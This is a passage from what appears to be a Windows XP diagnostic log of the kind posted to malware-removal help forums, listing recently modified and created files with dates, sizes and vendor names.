[2010/05/06 20:39:44 | 000,000,801 | ---- | M] () -- C:\Documents and Settings\Me\Start Menu\Programs\Startup\Find And Run Robot.lnk
[2010/05/06 20:36:03 | 000,000,046 | ---- | M] () -- C:\WINDOWS\System32\DonationCoder_findrunrobot_InstallInfo.dat
[2010/05/06 20:36:03 | 000,000,046 | ---- | M] () -- C:\Documents and Settings\Me\Local Settings\Application Data\DonationCoder_findrunrobot_InstallInfo.dat
[2010/05/06 20:24:03 | 000,002,626 | ---- | M] () -- C:\WINDOWS\System32\CONFIG.NT
[2010/05/06 16:59:36 | 000,165,032 | ---- | M] (ALWIL Software) -- C:\WINDOWS\System32\aswBoot.exe
[2010/05/06 16:39:23 | 000,046,672 | ---- | M] (ALWIL Software) -- C:\WINDOWS\System32\drivers\aswTdi.sys
[2010/05/06 16:39:00 | 000,164,048 | ---- | M] (ALWIL Software) -- C:\WINDOWS\System32\drivers\aswSP.sys
[2010/05/06 16:34:27 | 000,023,376 | ---- | M] (ALWIL Software) -- C:\WINDOWS\System32\drivers\aswRdr.sys
[2010/05/06 16:33:59 | 000,100,432 | ---- | M] (ALWIL Software) -- C:\WINDOWS\System32\drivers\aswmon2.sys
[2010/05/06 16:33:55 | 000,094,800 | ---- | M] (ALWIL Software) -- C:\WINDOWS\System32\drivers\aswmon.sys
[2010/05/06 16:33:47 | 000,019,024 | ---- | M] (ALWIL Software) -- C:\WINDOWS\System32\drivers\aswFsBlk.sys
[2010/05/06 16:33:29 | 000,028,880 | ---- | M] (ALWIL Software) -- C:\WINDOWS\System32\drivers\aavmker4.sys
[2010/05/04 22:42:48 | 000,526,010 | ---- | M] () -- C:\WINDOWS\System32\PerfStringBackup.INI
[2010/05/04 22:42:48 | 000,444,690 | ---- | M] () -- C:\WINDOWS\System32\perfh009.dat
[2010/05/04 22:42:48 | 000,072,456 | ---- | M] () -- C:\WINDOWS\System32\perfc009.dat
[2010/04/29 15:39:38 | 000,038,224 | ---- | M] (Malwarebytes Corporation) -- C:\WINDOWS\System32\drivers\mbamswissarmy.sys
[2010/04/29 15:39:26 | 000,020,952 | ---- | M] (Malwarebytes Corporation) -- C:\WINDOWS\System32\drivers\mbam.sys
[2010/04/26 15:58:12 | 000,256,512 | ---- | M] () -- C:\WINDOWS\PEV.exe
[2010/04/25 21:23:41 | 000,000,746 | ---- | M] () -- C:\Documents and Settings\Me\Desktop\Thomas New Line.lnk
[2010/04/25 11:50:13 | 000,230,824 | R--- | M] (Coupons, Inc.) -- C:\WINDOWS\System32\cpnprt2.cid
[2010/04/24 17:26:27 | 000,000,596 | ---- | M] () -- C:\Documents and Settings\Me\Start Menu\Programs\Startup\Shortcut to SnortStart.lnk
[2010/04/24 17:21:41 | 000,000,419 | ---- | M] () -- C:\Documents and Settings\Me\.oinkguirc
[2010/04/24 14:14:27 | 000,003,072 | -H-- | M] () -- C:\Documents and Settings\Me\My Documents\photothumb.db
[2010/04/21 21:16:06 | 000,000,073 | ---- | M] () -- C:\WINDOWS\System32\-1
[2010/04/20 20:18:40 | 000,413,696 | ---- | M] (Creative Labs) -- C:\WINDOWS\System32\wrap_oal.dll
[2010/04/20 20:18:40 | 000,110,592 | ---- | M] (Portions (C) Creative Labs Inc. and NVIDIA Corp.) -- C:\WINDOWS\System32\OpenAL32.dll
[2010/04/15 22:28:45 | 000,000,095 | ---- | M] () -- C:\Documents and Settings\Me\Desktop\SpongeBob SquarePants Hall Monitor & Jellyfish Jam SpongeBob Video SpongeBob.com.URL
[2010/04/14 12:47:23 | 000,038,848 | ---- | M] (ALWIL Software) -- C:\WINDOWS\System32\avastSS.scr
[2010/04/13 12:07:33 | 000,419,040 | ---- | M] () -- C:\WINDOWS\System32\FNTCACHE.DAT
[2010/04/11 21:17:19 | 000,130,792 | ---- | M] () -- C:\Documents and Settings\Me\Local Settings\Application Data\GDIPFONTCACHEV1.DAT
[2010/04/09 13:16:52 | 000,535,624 | ---- | M] () -- C:\WINDOWS\System32\pwNative.exe
[2010/04/09 13:16:50 | 000,016,472 | ---- | M] () -- C:\WINDOWS\System32\pwdrvio.sys
[2010/04/09 13:16:46 | 000,011,104 | ---- | M] () -- C:\WINDOWS\System32\pwdspio.sys
[2010/04/07 20:45:20 | 000,058,708 | ---- | M] () -- C:\Documents and Settings\Me\My Documents\0000.png
[2010/04/05 18:16:26 | 000,000,000 | ---- | M] () -- C:\Documents and Settings\Me\jagex__preferences3.dat
[2010/04/04 08:27:58 | 008,294,454 | ---- | M] () -- C:\WINDOWS\System32\toyhide.bmp
[2010/04/03 19:22:32 | 000,066,714 | ---- | M] () -- C:\WINDOWS\System32\NvwsApps.xml
[2010/04/03 18:55:31 | 002,183,470 | ---- | M] () -- C:\WINDOWS\System32\nvdata.bin
[2010/04/03 18:55:31 | 000,061,440 | ---- | M] (Khronos Group) -- C:\WINDOWS\System32\OpenCL.dll
[2010/04/03 18:55:31 | 000,009,046 | ---- | M] () -- C:\WINDOWS\System32\nvinfo.pb
[2010/04/01 11:26:20 | 003,939,704 | ---- | M] (Sysinternals - www.sysinternals.com) -- C:\Program Files\procexp.exe
[2010/03/29 19:54:53 | 000,000,600 | ---- | M] () -- C:\Documents and Settings\Me\Local Settings\Application Data\PUTTY.RND
[2010/03/26 22:01:55 | 000,000,000 | ---- | M] () -- C:\WINDOWS\System32\atiapfxx.blb
[2010/03/26 22:01:37 | 000,000,000 | ---- | M] () -- C:\WINDOWS\System32\atiicdxx.dat
[2010/03/23 07:57:08 | 000,358,944 | ---- | M] (Realtek Semiconductor Crop.) -- C:\WINDOWS\vncutil.exe
[2010/03/23 07:56:52 | 000,129,568 | ---- | M] (Realtek Semiconductor) -- C:\WINDOWS\RtkAudioService.exe
[2010/03/23 07:56:44 | 002,815,520 | ---- | M] (RealTek Semicoductor Corp.) -- C:\WINDOWS\ALCWZRD.EXE
[2010/03/20 09:54:51 | 000,000,306 | ---- | M] () -- C:\WINDOWS\IfoEdit.INI
[2010/03/20 09:50:19 | 000,000,107 | ---- | M] () -- C:\WINDOWS\VobEdit.INI
[2010/03/19 20:56:32 | 000,044,579 | ---- | M] () -- C:\Documents and Settings\Me\peerblock.dmp
[2010/03/17 19:33:51 | 000,000,000 | ---- | M] () -- C:\WINDOWS\System32\drivers\UMDF\Msft_User_WpdMtpDr_01_00_00.Wdf
[2010/03/13 16:15:41 | 000,000,000 | ---- | M] () -- C:\WINDOWS\ativpsrm.bin
[2010/03/09 22:51:32 | 000,000,008 | ---- | M] () -- C:\WINDOWS\System32\drivers\RTKHDAUD.DAT
[2010/03/09 20:47:35 | 000,001,863 | ---- | M] () -- C:\Documents and Settings\All Users\Desktop\Microsoft Digital Image Suite 2006 Library.lnk
[2010/03/09 20:47:09 | 000,001,923 | ---- | M] () -- C:\Documents and Settings\All Users\Desktop\Microsoft Digital Image Suite 2006 Editor.lnk
[2010/02/27 13:24:27 | 000,000,926 | ---- | M] () -- C:\Documents and Settings\Me\Start Menu\Programs\Startup\Dropbox.lnk
[2010/02/24 22:54:07 | 000,000,070 | --S- | M] () -- C:\Documents and Settings\Me\jd
[2010/02/23 00:18:52 | 000,000,762 | ---- | M] () -- C:\Documents and Settings\Me\Desktop\Disney Princess Magical Dress-Up.lnk
[2010/02/23 00:17:31 | 000,001,290 | ---- | M] () -- C:\WINDOWS\disney.ini
[2010/02/23 00:11:52 | 000,000,794 | ---- | M] () -- C:\Documents and Settings\Me\Desktop\Bob The Builder.lnk
[2010/02/23 00:09:38 | 000,000,034 | ---- | M] () -- C:\WINDOWS\Tiny_Run.ini
[2010/02/22 09:03:30 | 000,001,744 | -H-- | M] () -- C:\Documents and Settings\Me\My Documents\Default.rdp
[2010/02/21 19:37:32 | 000,000,000 | ---- | M] () -- C:\WINDOWS\System32\drivers\Msft_Kernel_LMouFilt_01005.Wdf
[2010/02/21 19:37:32 | 000,000,000 | ---- | M] () -- C:\WINDOWS\System32\drivers\Msft_Kernel_LHidFilt_01005.Wdf
[2010/02/21 19:37:29 | 000,000,000 | ---- | M] () -- C:\WINDOWS\System32\drivers\MsftWdf_Kernel_01005_Coinstaller_Critical.Wdf
[2010/02/21 19:35:54 | 000,001,696 | ---- | M] () -- C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Logitech SetPoint.lnk
[2010/02/17 06:01:31 | 000,000,036 | ---- | M] () -- C:\Documents and Settings\Me\Local Settings\Application Data\housecall.guid.cache
[2010/02/16 22:44:05 | 000,000,016 | ---- | M] () -- C:\WINDOWS\System32\w3data.vss
[2010/02/16 22:44:05 | 000,000,016 | ---- | M] () -- C:\WINDOWS\msocreg32.dat
[2010/02/16 00:13:43 | 000,002,892 | ---- | M] () -- C:\WINDOWS\System32\audcon.sys
[2010/02/15 19:03:59 | 000,039,755 | ---- | M] () -- C:\boot0
[2010/02/15 16:21:18 | 000,012,540 | ---- | M] () -- C:\WINDOWS\System32\wpa.bak
[2010/02/14 01:13:11 | 000,691,696 | ---- | M] () -- C:\WINDOWS\System32\drivers\sptd.sys
[2010/02/13 23:16:27 | 000,000,731 | ---- | M] () -- C:\Documents and Settings\Me\Desktop\Blues Clues.lnk
[2010/02/13 23:15:54 | 000,000,134 | ---- | M] () -- C:\WINDOWS\BluesCluesPreschool.ini
[2010/02/13 20:59:57 | 000,000,705 | ---- | M] () -- C:\Documents and Settings\Me\Desktop\Thomas.lnk
[2010/02/13 20:59:11 | 000,000,219 | ---- | M] () -- C:\WINDOWS\PowerReg.dat
[2010/02/13 17:41:01 | 000,000,004 | ---- | M] () -- C:\WINDOWS\Pix11.dat
[2010/02/13 17:29:27 | 000,000,818 | ---- | M] () -- C:\WINDOWS\System32\unins000.dat
[2010/02/13 17:23:03 | 000,072,748 | ---- | M] (Jordan Russell) -- C:\WINDOWS\unins001.exe
[2010/02/13 17:23:03 | 000,000,801 | ---- | M] () -- C:\WINDOWS\unins001.dat
[2010/02/13 17:22:56 | 000,072,748 | ---- | M] (Jordan Russell) -- C:\WINDOWS\unins000.exe
[2010/02/13 17:22:56 | 000,000,801 | ---- | M] () -- C:\WINDOWS\unins000.dat
[2010/02/13 16:48:00 | 000,000,578 | ---- | M] () -- C:\Documents and Settings\Me\Start Menu\Programs\Startup\Shortcut to procexp.lnk
[2010/02/13 11:28:07 | 000,023,392 | ---- | M] () -- C:\WINDOWS\System32\nscompat.tlb
[2010/02/13 11:28:07 | 000,016,832 | ---- | M] () -- C:\WINDOWS\System32\amcompat.tlb
[2010/02/13 11:27:17 | 000,000,000 | ---- | M] () -- C:\WINDOWS\System32\drivers\UMDF\MsftWdf_user_01_00_00.Wdf
[2010/02/13 10:43:56 | 000,316,640 | ---- | M] () -- C:\WINDOWS\WMSysPr9.prx
[2010/02/13 09:44:58 | 000,250,048 | RHS- | M] () -- C:\ntldr
[2010/02/12 23:18:02 | 000,000,000 | ---- | M] () -- C:\WINDOWS\nsreg.dat
[2010/02/12 23:16:43 | 000,940,794 | ---- | M] () -- C:\WINDOWS\System32\LoopyMusic.wav
[2010/02/12 23:16:43 | 000,146,650 | ---- | M] () -- C:\WINDOWS\System32\BuzzingBee.wav
[2010/02/12 22:12:01 | 000,000,010 | ---- | M] () -- C:\WINDOWS\GSetup.ini
[2010/02/12 22:07:32 | 000,008,192 | ---- | M] () -- C:\WINDOWS\REGLOCS.OLD
[2010/02/12 22:06:30 | 000,000,261 | ---- | M] () -- C:\WINDOWS\System32\$winnt$.inf
[2010/02/12 22:03:36 | 000,000,000 | RHS- | M] () -- C:\MSDOS.SYS
[2010/02/12 22:03:36 | 000,000,000 | RHS- | M] () -- C:\IO.SYS
[2010/02/12 22:03:36 | 000,000,000 | ---- | M] () -- C:\WINDOWS\control.ini
[2010/02/12 22:03:36 | 000,000,000 | ---- | M] () -- C:\CONFIG.SYS
[2010/02/12 22:03:36 | 000,000,000 | ---- | M] () -- C:\AUTOEXEC.BAT
[2010/02/12 22:03:24 | 000,004,161 | ---- | M] () -- C:\WINDOWS\ODBCINST.INI
[2010/02/12 22:02:39 | 000,000,488 | ---- | M] () -- C:\WINDOWS\System32\WindowsLogon.manifest
[2010/02/12 22:02:39 | 000,000,488 | ---- | M] () -- C:\WINDOWS\System32\logonui.exe.manifest
[2010/02/12 22:02:35 | 000,000,749 | RH-- | M] () -- C:\WINDOWS\WindowsShell.Manifest
[2010/02/12 22:02:35 | 000,000,749 | ---- | M] () -- C:\WINDOWS\System32\wuaucpl.cpl.manifest
[2010/02/12 22:02:35 | 000,000,749 | ---- | M] () -- C:\WINDOWS\System32\sapi.cpl.manifest
[2010/02/12 22:02:35 | 000,000,749 | ---- | M] () -- C:\WINDOWS\System32\nwc.cpl.manifest
[2010/02/12 22:02:35 | 000,000,749 | ---- | M] () -- C:\WINDOWS\System32\ncpa.cpl.manifest
[2010/02/12 22:02:35 | 000,000,749 | ---- | M] () -- C:\WINDOWS\System32\cdplayer.exe.manifest
[2010/02/12 21:59:39 | 000,021,640 | ---- | M] () -- C:\WINDOWS\System32\emptyregdb.dat
[2010/02/12 21:59:29 | 000,000,037 | ---- | M] () -- C:\WINDOWS\vbaddin.ini
[2010/02/12 21:59:29 | 000,000,036 | ---- | M] () -- C:\WINDOWS\vb.ini
[7 C:\WINDOWS\*.tmp files -> C:\WINDOWS\*.tmp -> ]
[4 C:\WINDOWS\System32\*.tmp files -> C:\WINDOWS\System32\*.tmp -> ]
[1 C:\Documents and Settings\Me\*.tmp files -> C:\Documents and Settings\Me\*.tmp -> ]

[color=#E56717]========== Files Created - No Company Name ==========[/color]

[2010/05/13 20:23:48 | 009,115,308 | ---- | C] () -- C:\Documents and Settings\Me\Desktop\pidgin-2.7.0.exe
[2010/05/12 16:15:05 | 000,134,825 | ---- | C] () -- C:\Documents and Settings\Me\Desktop\jody-seit-form-blank.pdf
[2010/05/12 16:10:02 | 000,182,179 | ---- | C] () -- C:\Documents and Settings\Me\Desktop\jody-seit-form-01(3).pdf
[2010/05/12 16:06:11 | 000,182,349 | ---- | C] () -- C:\Documents and Settings\Me\Desktop\jody-seit-form-01(2).pdf
[2010/05/12 15:45:04 | 000,079,807 | ---- | C] () -- C:\Documents and Settings\Me\Desktop\jody-seit-form-01.pdf
[2010/05/12 15:44:09 | 002,088,136 | ---- | C] () -- C:\Documents and Settings\Me\Desktop\jody-seit-form-01.jpg
[2010/05/12 12:40:06 | 000,000,807 | ---- | C] () -- C:\Documents and Settings\All Users\Desktop\PrimoPDF - Drop Files Here to Convert!.lnk
[2010/05/12 12:40:03 | 000,176,235 | ---- | C] () -- C:\WINDOWS\System32\Primomonnt.dll
[2010/05/11 19:26:43 | 000,000,801 | ---- | C] () -- C:\Documents and Settings\Me\Start Menu\Programs\Startup\Find And Run Robot.lnk
[2010/05/11 18:37:03 | 000,000,244 | ---- | C] () -- C:\Boot.bak
[2010/05/11 18:36:59 | 000,260,272 | ---- | C] () -- C:\cmldr
[2010/05/11 18:35:18 | 000,256,512 | ---- | C] () -- C:\WINDOWS\PEV.exe
[2010/05/11 18:35:18 | 000,098,816 | ---- | C] () -- C:\WINDOWS\sed.exe
[2010/05/11 18:35:18 | 000,080,412 | ---- | C] () -- C:\WINDOWS\grep.exe
[2010/05/11 18:35:18 | 000,077,312 | ---- | C] () -- C:\WINDOWS\MBR.exe
[2010/05/11 18:35:18 | 000,068,096 | ---- | C] () -- C:\WINDOWS\zip.exe
[2010/05/11 15:16:09 | 000,000,008 | ---- | C] () -- C:\WINDOWS\System32\drivers\RTKHDAUD.DAT
[2010/05/11 15:08:46 | 000,071,676 | ---- | C] () -- C:\Documents and Settings\Me\My Documents\DriverAgent_scan_results
[2010/05/11 15:01:44 | 001,048,576 | ---- | C] () -- C:\bios-save.rom
[2010/05/10 07:05:28 | 000,535,624 | ---- | C] () -- C:\WINDOWS\System32\pwNative.exe
[2010/05/10 07:05:26 | 000,016,472 | ---- | C] () -- C:\WINDOWS\System32\pwdrvio.sys
[2010/05/10 07:05:25 | 000,011,104 | ---- | C] () -- C:\WINDOWS\System32\pwdspio.sys
[2010/05/06 20:36:03 | 000,000,046 | ---- | C] () -- C:\WINDOWS\System32\DonationCoder_findrunrobot_InstallInfo.dat
[2010/05/06 20:36:03 | 000,000,046 | ---- | C] () -- C:\Documents and Settings\Me\Local Settings\Application Data\DonationCoder_findrunrobot_InstallInfo.dat
[2010/04/25 21:22:54 | 000,000,746 | ---- | C] () -- C:\Documents and Settings\Me\Desktop\Thomas New Line.lnk
[2010/04/24 17:26:19 | 000,000,596 | ---- | C] () -- C:\Documents and Settings\Me\Start Menu\Programs\Startup\Shortcut to SnortStart.lnk
[2010/04/24 17:21:41 | 000,000,419 | ---- | C] () -- C:\Documents and Settings\Me\.oinkguirc
[2010/04/24 14:24:38 | 000,003,840 | ---- | C] () -- C:\WINDOWS\System32\drivers\BANTExt.sys
[2010/04/24 14:14:04 | 000,003,072 | -H-- | C] () -- C:\Documents and Settings\Me\My Documents\photothumb.db
[2010/04/21 21:16:05 | 000,000,073 | ---- | C] () -- C:\WINDOWS\System32\-1
[2010/04/15 22:28:45 | 000,000,095 | ---- | C] () -- C:\Documents and Settings\Me\Desktop\SpongeBob SquarePants Hall Monitor & Jellyfish Jam SpongeBob Video SpongeBob.com.URL
[2010/04/12 00:18:43 | 001,900,132 | ---- | C] () -- C:\WINDOWS\System32\ExpansionHD_Firmware.bin
[2010/04/12 00:18:43 | 000,192,512 | ---- | C] () -- C:\WINDOWS\System32\DigiPlatformSupport.dll
[2010/04/11 20:55:54 | 000,487,912 | ---- | C] () -- C:\Documents and Settings\LocalService\Local Settings\Application Data\FontCache3.0.0.0.dat
[2010/04/11 13:11:01 | 000,058,708 | ---- | C] () -- C:\Documents and Settings\Me\My Documents\0000.png
[2010/04/10 21:18:57 | 000,001,014 | ---- | C] () -- C:\WINDOWS\tasks\GoogleUpdateTaskUserS-1-5-21-746137067-1078081533-839522115-1003UA.job
[2010/04/10 21:18:56 | 000,000,962 | ---- | C] () -- C:\WINDOWS\tasks\GoogleUpdateTaskUserS-1-5-21-746137067-1078081533-839522115-1003Core.job
[2010/04/08 17:52:39 | 000,038,492 | ---- | C] () -- C:\WINDOWS\System32\DLLAV32.lib
[2010/04/08 17:51:49 | 000,120,200 | ---- | C] () -- C:\WINDOWS\System32\DLLDEV32i.dll
[2010/04/05 18:16:26 | 000,000,075 | ---- | C] () -- C:\Documents and Settings\Me\jagex_runescape_preferences2.dat
[2010/04/05 18:16:26 | 000,000,000 | ---- | C] () -- C:\Documents and Settings\Me\jagex__preferences3.dat
[2010/04/05 18:15:09 | 000,000,041 | ---- | C] () -- C:\Documents and Settings\Me\jagex_runescape_preferences.dat
[2010/04/03 19:22:32 | 000,066,714 | ---- | C] () -- C:\WINDOWS\System32\NvwsApps.xml
[2010/04/03 19:22:32 | 000,000,104 | ---- | C] () -- C:\WINDOWS\System32\NvApps.xml
[2010/03/26 22:01:55 | 000,000,000 | ---- | C] () -- C:\WINDOWS\System32\atiapfxx.blb
[2010/03/26 22:01:37 | 000,000,000 | ---- | C] () -- C:\WINDOWS\System32\atiicdxx.dat
[2010/03/26 21:43:52 | 002,183,470 | ---- | C] () -- C:\WINDOWS\System32\nvdata.bin
[2010/03/20 09:50:19 | 000,000,107 | ---- | C] () -- C:\WINDOWS\VobEdit.INI
[2010/03/19 23:00:32 | 008,294,454 | ---- | C] () -- C:\WINDOWS\System32\toyhide.bmp
[2010/03/19 22:06:54 | 000,001,696 | ---- | C] () -- C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Logitech SetPoint.lnk
[2010/03/19 22:06:54 | 000,000,926 | ---- | C] () -- C:\Documents and Settings\Me\Start Menu\Programs\Startup\Dropbox.lnk
[2010/03/19 22:06:54 | 000,000,578 | ---- | C] () -- C:\Documents and Settings\Me\Start Menu\Programs\Startup\Shortcut to procexp.lnk
[2010/03/19 15:56:02 | 000,044,579 | ---- | C] () -- C:\Documents and Settings\Me\peerblock.dmp
[2010/03/17 19:33:51 | 000,000,000 | ---- | C] () -- C:\WINDOWS\System32\drivers\UMDF\Msft_User_WpdMtpDr_01_00_00.Wdf
[2010/03/14 17:06:51 | 000,117,850 | ---- | C] () -- C:\WINDOWS\System32\Cnmnput.chm
[2010/03/13 16:15:41 | 000,000,000 | ---- | C] () -- C:\WINDOWS\ativpsrm.bin
[2010/03/13 16:11:33 | 000,007,167 | ---- | C] () -- C:\WINDOWS\System32\atifglpf.xml
[2010/03/13 16:11:29 | 000,294,912 | ---- | C] () -- C:\WINDOWS\System32\ATIODE.exe
[2010/03/13 16:11:29 | 000,045,056 | ---- | C] () -- C:\WINDOWS\System32\ATIODCLI.exe
[2010/03/13 16:11:28 | 000,455,520 | ---- | C] () -- C:\WINDOWS\System32\ativvaxx.cap
[2010/03/13 10:39:47 | 000,419,040 | ---- | C] () -- C:\WINDOWS\System32\FNTCACHE.DAT
[2010/03/09 20:47:35 | 000,001,863 | ---- | C] () -- C:\Documents and Settings\All Users\Desktop\Microsoft Digital Image Suite 2006 Library.lnk
[2010/03/09 20:47:09 | 000,001,923 | ---- | C] () -- C:\Documents and Settings\All Users\Desktop\Microsoft Digital Image Suite 2006 Editor.lnk
[2010/02/26 13:22:25 | 000,000,600 | ---- | C] () -- C:\Documents and Settings\Me\Local Settings\Application Data\PUTTY.RND
[2010/02/24 22:54:07 | 000,000,070 | --S- | C] () -- C:\Documents and Settings\Me\jd
[2010/02/23 00:18:27 | 000,000,762 | ---- | C] () -- C:\Documents and Settings\Me\Desktop\Disney Princess Magical Dress-Up.lnk
[2010/02/23 00:16:14 | 000,001,290 | ---- | C] () -- C:\WINDOWS\disney.ini
[2010/02/23 00:11:25 | 000,000,794 | ---- | C] () -- C:\Documents and Settings\Me\Desktop\Bob The Builder.lnk
[2010/02/22 23:57:10 | 000,354,816 | ---- | C] () -- C:\WINDOWS\System32\psisdecd.dll
[2010/02/22 23:57:10 | 000,354,816 | ---- | C] () -- C:\WINDOWS\System32\dllcache\psisdecd.dll
[2010/02/22 23:57:10 | 000,052,224 | ---- | C] () -- C:\WINDOWS\System32\msdvbnp.ax
[2010/02/22 23:57:10 | 000,052,224 | ---- | C] () -- C:\WINDOWS\System32\dllcache\msdvbnp.ax
[2010/02/22 23:57:10 | 000,030,208 | ---- | C] () -- C:\WINDOWS\System32\psisrndr.ax
[2010/02/22 23:57:10 | 000,030,208 | ---- | C] () -- C:\WINDOWS\System32\dllcache\psisrndr.ax
[2010/02/22 23:57:09 | 001,798,144 | ---- | C] () -- C:\WINDOWS\System32\dllcache\qedit.dll
[2010/02/22 23:57:09 | 000,733,184 | ---- | C] () -- C:\WINDOWS\System32\dllcache\qedwipes.dll
[2010/02/22 23:57:09 | 000,470,528 | ---- | C] () -- C:\WINDOWS\System32\dllcache\qdvd.dll
[2010/02/22 23:57:09 | 000,316,928 | ---- | C] () -- C:\WINDOWS\System32\dllcache\qdv.dll
[2010/02/22 23:57:09 | 000,257,024 | ---- | C] () -- C:\WINDOWS\System32\dllcache\qcap.dll
[2010/02/22 23:57:09 | 000,173,056 | ---- | C] () -- C:\WINDOWS\System32\dllcache\qasf.dll
[2010/02/22 23:57:09 | 000,136,192 | ---- | C] () -- C:\WINDOWS\System32\dllcache\mpg2splt.ax
[2010/02/22 23:57:09 | 000,132,608 | ---- | C] () -- C:\WINDOWS\System32\dllcache\devenum.dll
[2010/02/22 23:57:09 | 000,064,512 | ---- | C] () -- C:\WINDOWS\System32\dllcache\amstream.dll
[2010/02/22 23:57:09 | 000,034,304 | ---- | C] () -- C:\WINDOWS\System32\dllcache\mciqtz32.dll
[2010/02/22 23:57:09 | 000,013,312 | ---- | C] () -- C:\WINDOWS\System32\dllcache\msdmo.dll
[2010/02/22 23:55:48 | 000,000,034 | ---- | C] () -- C:\WINDOWS\Tiny_Run.ini
[2010/02/22 09:02:48 | 000,001,744 | -H-- | C] () -- C:\Documents and Settings\Me\My Documents\Default.rdp
[2010/02/21 19:37:32 | 000,000,000 | ---- | C] () -- C:\WINDOWS\System32\drivers\Msft_Kernel_LMouFilt_01005.Wdf
[2010/02/21 19:37:32 | 000,000,000 | ---- | C] () -- C:\WINDOWS\System32\drivers\Msft_Kernel_LHidFilt_01005.Wdf
[2010/02/21 19:37:29 | 000,000,000 | ---- | C] () -- C:\WINDOWS\System32\drivers\MsftWdf_Kernel_01005_Coinstaller_Critical.Wdf
[2010/02/21 18:00:29 | 000,000,306 | ---- | C] () -- C:\WINDOWS\IfoEdit.INI
[2010/02/21 17:30:10 | 000,027,648 | ---- | C] () -- C:\WINDOWS\System32\AVSredirect.dll
[2010/02/21 17:29:57 | 000,227,328 | ---- | C] () -- C:\WINDOWS\System32\ac3DX.ax
[2010/02/21 17:29:57 | 000,175,104 | ---- | C] () -- C:\WINDOWS\System32\CoreAAC.ax
[2010/02/21 17:29:57 | 000,120,832 | ---- | C] () -- C:\WINDOWS\System32\MPCDx.ax
[2010/02/21 17:29:57 | 000,107,520 | ---- | C] () -- C:\WINDOWS\System32\RLMPCDec.ax
[2010/02/21 17:29:57 | 000,097,280 | ---- | C] () -- C:\WINDOWS\System32\FLACDX.ax
[2010/02/21 17:29:57 | 000,081,920 | ---- | C] () -- C:\WINDOWS\System32\aac_parser.ax
[2010/02/21 17:29:57 | 000,070,656 | ---- | C] () -- C:\WINDOWS\System32\RLAPEDec.ax
[2010/02/21 17:29:57 | 000,051,712 | ---- | C] () -- C:\WINDOWS\System32\RLSpeexDec.ax
[2010/02/17 06:01:31 | 000,000,036 | ---- | C] () -- C:\Documents and Settings\Me\Local Settings\Application Data\housecall.guid.cache
[2010/02/16 21:38:45 | 000,000,016 | ---- | C] () -- C:\WINDOWS\System32\w3data.vss
[2010/02/16 21:38:45 | 000,000,016 | ---- | C] () -- C:\WINDOWS\msocreg32.dat
[2010/02/16 00:13:43 | 000,002,892 | ---- | C] () -- C:\WINDOWS\System32\audcon.sys
[2010/02/15 20:30:15 | 000,000,512 | ---- | C] () -- C:\chain0
[2010/02/15 19:07:46 | 000,000,315 | RHS- | C] () -- C:\boot.ini
[2010/02/15 19:06:29 | 000,039,755 | ---- | C] () -- C:\boot0
[2010/02/14 01:13:11 | 000,691,696 | ---- | C] () -- C:\WINDOWS\System32\drivers\sptd.sys
[2010/02/13 23:18:42 | 002,359,350 | ---- | C] () -- C:\WINDOWS\Me.bmp
[2010/02/13 23:18:19 | 000,000,487 | ---- | C] () -- C:\Documents and Settings\Me\My Documents\Winstep.lnk
[2010/02/13 23:15:52 | 000,000,134 | ---- | C] () -- C:\WINDOWS\BluesCluesPreschool.ini
[2010/02/13 23:15:50 | 000,000,080 | ---- | C] () -- C:\WINDOWS\System32\vssver.scc
[2010/02/13 21:02:05 | 000,000,731 | ---- | C] () -- C:\Documents and Settings\Me\Desktop\Blues Clues.lnk
[2010/02/13 20:59:06 | 000,000,219 | ---- | C] () -- C:\WINDOWS\PowerReg.dat
[2010/02/13 20:56:56 | 000,000,705 | ---- | C] () -- C:\Documents and Settings\Me\Desktop\Thomas.lnk
[2010/02/13 20:54:44 | 000,160,217 | ---- | C] () -- C:\WINDOWS\System32\PowerToysLicense.rtf
[2010/02/13 17:52:56 | 000,056,832 | ---- | C] () -- C:\Documents and Settings\Me\Local Settings\Application Data\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
[2010/02/13 17:41:01 | 000,000,004 | ---- | C] () -- C:\WINDOWS\Pix11.dat
[2010/02/13 17:29:27 | 000,000,818 | ---- | C] () -- C:\WINDOWS\System32\unins000.dat
[2010/02/13 17:23:03 | 000,000,801 | ---- | C] () -- C:\WINDOWS\unins001.dat
[2010/02/13 17:22:55 | 000,000,801 | ---- | C] () -- C:\WINDOWS\unins000.dat
[2010/02/13 11:27:17 | 000,000,000 | ---- | C] () -- C:\WINDOWS\System32\drivers\UMDF\MsftWdf_user_01_00_00.Wdf
[2010/02/13 09:47:37 | 000,010,457 | ---- | C] () -- C:\WINDOWS\System32\dllcache\wmptour.hta
[2010/02/13 09:47:37 | 000,001,771 | ---- | C] () -- C:\WINDOWS\System32\dllcache\wmptour.css
[2010/02/13 09:47:37 | 000,000,855 | ---- | C] () -- C:\WINDOWS\System32\dllcache\wmpocm.inf
[2010/02/13 09:47:37 | 000,000,420 | ---- | C] () -- C:\WINDOWS\System32\dllcache\wmploc.js
[2010/02/13 09:47:36 | 000,613,334 | ---- | C] () -- C:\WINDOWS\System32\dllcache\wmplayer.chm
[2010/02/13 09:47:36 | 000,572,557 | ---- | C] () -- C:\WINDOWS\System32\dllcache\rtuner.wmv
[2010/02/13 09:47:36 | 000,354,468 | ---- | C] () -- C:\WINDOWS\System32\dllcache\wmpaud1.wav
[2010/02/13 09:47:36 | 000,343,204 | ---- | C] () -- C:\WINDOWS\System32\dllcache\wmpaud7.wav
[2010/02/13 09:47:36 | 000,343,204 | ---- | C] () -- C:\WINDOWS\System32\dllcache\wmpaud6.wav
[2010/02/13 09:47:36 | 000,300,969 | ---- | C] () -- C:\WINDOWS\System32\dllcache\viz.wmv
[2010/02/13 09:47:36 | 000,172,196 | ---- | C] () -- C:\WINDOWS\System32\dllcache\wmpaud9.wav
[2010/02/13 09:47:36 | 000,172,196 | ---- | C] () -- C:\WINDOWS\System32\dllcache\wmpaud8.wav
[2010/02/13 09:47:36 | 000,172,196 | ---- | C] () -- C:\WINDOWS\System32\dllcache\wmpaud3.wav
[2010/02/13 09:47:36 | 000,086,196 | ---- | C] () -- C:\WINDOWS\System32\dllcache\wmpaud5.wav
[2010/02/13 09:47:36 | 000,086,180 | ---- | C] () -- C:\WINDOWS\System32\dllcache\wmpaud4.wav
[2010/02/13 09:47:36 | 000,086,180 | ---- | C] () -- C:\WINDOWS\System32\dllcache\wmpaud2.wav
